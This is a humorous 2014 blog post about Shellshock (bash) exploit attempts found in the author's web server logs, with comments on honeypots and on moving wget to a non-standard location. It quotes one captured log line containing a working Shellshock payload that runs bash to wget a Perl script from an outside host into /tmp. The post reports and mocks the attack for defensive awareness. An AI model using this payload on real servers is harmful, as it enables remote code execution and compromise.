Fork me on Github
Fork me on Github

Joe Dog Software

Proudly serving the Internets since 1999

up arrow Incoming!!

By jdfulmer | Published October 2, 2014 | Leave a comment

I don’t know about you, but Your JoeDog is shell shocked. His logs are filled with stuff like this:

173.245.53.136 – – [25/Sep/2014:16:42:37 -0400] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.1” 301 – “-” “() { :;}; /bin/bash -c “/usr/bin/wget http://singlesaints.com/firefile/temp?h=joedog.org -O /tmp/a.pl””

So what’s happening here? Basically, some asshole is trying to exploit last week’s widely publicized bash shell vulnerability to invoke wget and pull down a perl script named “a.pl”

First of all, Your JoeDog hates scripts with an extension to designate the language in which they were coded. The person running the script doesn’t care what language it runs under. The computer will read the sh-bang line (#!/bin/perl) and call the appropriate interpreter. What’s the point of adding .pl? When you attack JoeDog’s computers please do so without a file extension, mmmmkay?

Second of all, he’s not going to find wget. On Your JoeDog’s computer it was installed in /bin/wget. But don’t bother trying to invoke it from there either. In accordance with best practice, it was moved it to a non-standard location. (You should do that, too.)

So while many of us are annoyed with this vulnerability, security firms and tech news companies are peeing themselves with excitement.

Dice tells us about ThreatStream, a cyber intelligence firm who’ve released ShockPot, a shell-shock honey pot. You can set it up on an publicly accessible server and watch knuckleheads try to ‘sploit you. Sounds like somebody needs a hobby.

Dice downloaded the software package and set it up on Linode, a Linux hosting site. Within a few days, they were shell-shocked seven times. Instead of wasting their time with honey pots, they could come over here and tail Your JoeDog’s logs. He was attacked 18 times in the last eight hours.

NOTE: The script they tried to pull was hosted on singlesaints.com, a Mormon dating site located in Utah. Your JoeDog attempted to snag that file for examination and they blocked his request.

HTTP request sent, awaiting response... 403 Forbidden

Props to all the single Mormon nerds who helped fix that issue in a timely fashion.